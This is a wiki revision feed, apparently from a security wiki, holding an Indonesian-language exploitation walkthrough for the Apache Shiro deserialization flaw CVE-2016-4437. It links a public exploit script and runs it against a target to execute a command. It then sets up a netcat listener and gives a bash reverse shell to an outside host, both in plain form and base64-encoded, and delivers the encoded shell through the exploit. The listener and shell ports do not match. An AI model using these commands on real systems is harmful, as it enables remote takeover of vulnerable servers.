https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2016-4437_Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%2Fid
CVE-2016-4437 Shiro反序列化漏洞/id - Revision history
2026-04-08T04:19:27Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2016-4437_Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/id&diff=3335&oldid=prev
Pwnwiki: Created page with "Perintah berhasil dijalankan."
2021-05-26T13:18:47Z
<p>Created page with "Perintah berhasil dijalankan."</p>
<p><b>New page</b></p><div><languages /><br />
<br />
==POC==<br />
https://github.com/insightglacier/Shiro_exploit<br />
<br />
<br />
== Eksploitasi ==<br />
<pre><br />
python3 shiro_exploit.py -t 3 -u http://192.168.2.147:8080 -p "touch a.txt"<br />
</pre><br />
<br />
Perintah berhasil dijalankan.<br />
<br />
<br />
==Getshell==<br />
Mesin pemantau menjalankan perintah berikut:<br />
<pre><br />
nc -lvp 666<br />
</pre><br />
<br />
Mesin korban menjalankan perintah berikut:<br />
<pre><br />
bash -i >& /dev/tcp/192.168.2.130/6666 0>&1<br />
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTMwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}<br />
</pre><br />
<br />
<br />
<br />
<pre><br />
python3 shiro_exploit.py -t 3 -u http://192.168.2.147:8080 -p "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTMwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}"<br />
</pre></div>
Pwnwiki